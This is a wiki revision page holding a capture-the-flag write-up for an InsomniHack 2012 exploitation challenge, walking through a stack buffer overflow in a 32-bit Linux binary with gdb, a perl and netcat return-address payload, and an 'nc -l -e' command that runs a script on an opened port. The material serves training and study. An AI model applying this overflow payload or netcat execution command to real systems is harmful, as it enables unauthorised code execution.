Changes

Jump to: navigation, search

InsomniHack-2012/Exploitation/3 Taberne

393 bytes added, 21:22, 5 March 2012
We downloaded a file called "toto",
<presyntaxhighlight lang="bash">
# file toto
toto: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
# ./toto 1234
</presyntaxhighlight>
On a client, we get:
<presyntaxhighlight lang="bash">
> nc 172.16.199.131 1234
Adieu l'ami, dis-voir c'que c'est ton mot de passe: blabla
De dieu, tu t'en souviens pas? C'est balot!
</presyntaxhighlight>
It's an exploitation, so on the server, we debug the program (it forks, to we follow the child):
<presyntaxhighlight lang="bash">
# gdb -q ./toto
(gdb) set follow-fork-mode child
(gdb) r 1234
Starting program: /root/toto 1234
</presyntaxhighlight>
On the client, let's do:
<presyntaxhighlight lang="bash">
> echo `perl -e 'print "A"x24 '`| nc 172.16.199.131 1234
Adieu l'ami, dis-voir c'que c'est ton mot de passe:
</presyntaxhighlight>
And the server segfaults:
<presyntaxhighlight lang="bash">
Program received signal SIGSEGV, Segmentation fault.
[Switching to process 1962]
0x41414141 in ?? ()
</presyntaxhighlight>
The backtrace is definitely screwed, so we just have a quick look:
<presyntaxhighlight lang="asm">
0804888c <checkPass>:
80488ac: c9 leave
80488ad: c3 ret
</presyntaxhighlight>
We shipped 24 bytes, so we wrote the return address. Let break on the ret of checkPass:
<presyntaxhighlight lang="asm">
(gdb) b *0x80488ad
Breakpoint 1 at 0x80488ad
0xbfe019cc: 0xb5df0002 0x01c710ac 0x00000000 0x00000000
0xbfe019dc: 0xd4040002 0x00000000 0x00000000 0x00000000
</presyntaxhighlight>
So we rewrote with 0x41414141. What to put here ?
By having a very quick look at the binary, there is an interesting function called pwnthis:
<presyntaxhighlight lang="asm">
(gdb) disassemble pwnthis
Dump of assembler code for function pwnthis:
0x0804888b <pwnthis+156>: ret
</presyntaxhighlight>
So we are going to write the address to return there and break before the system to see the content:
<presyntaxhighlight lang="bash">
> echo `perl -e 'print "A"x20 . "\xef\x87\x04\x08" , "AAAA" . "CCCC" '`| nc 172.16.199.131 1234
Adieu l'ami, dis-voir c'que c'est ton mot de passe:
</presyntaxhighlight>
And on the server side:
<presyntaxhighlight lang="bash">
Breakpoint 2, 0x0804887e in pwnthis ()
(gdb) x /wx $esp
(gdb) x /s 0xbf9e3c83
0xbf9e3c83: "nc -l -e /tmp/showpass.sh -p 1128
</presyntaxhighlight>
Amazing, it's gonna open a local port on 1128. You can modify the port, since it's part of the buffer you write
So now, we just need to connect to the remote port to execute the showpass.sh. The server was dead, validation was not possible.
<presyntaxhighlight lang="bash">
> nc 172.16.199.131 1128
</presyntaxhighlight>
Rorist
ControlGroup, administrator
4,210
edits
Retrieved from "https://fixme.ch/wiki/Special:MobileDiff/1740"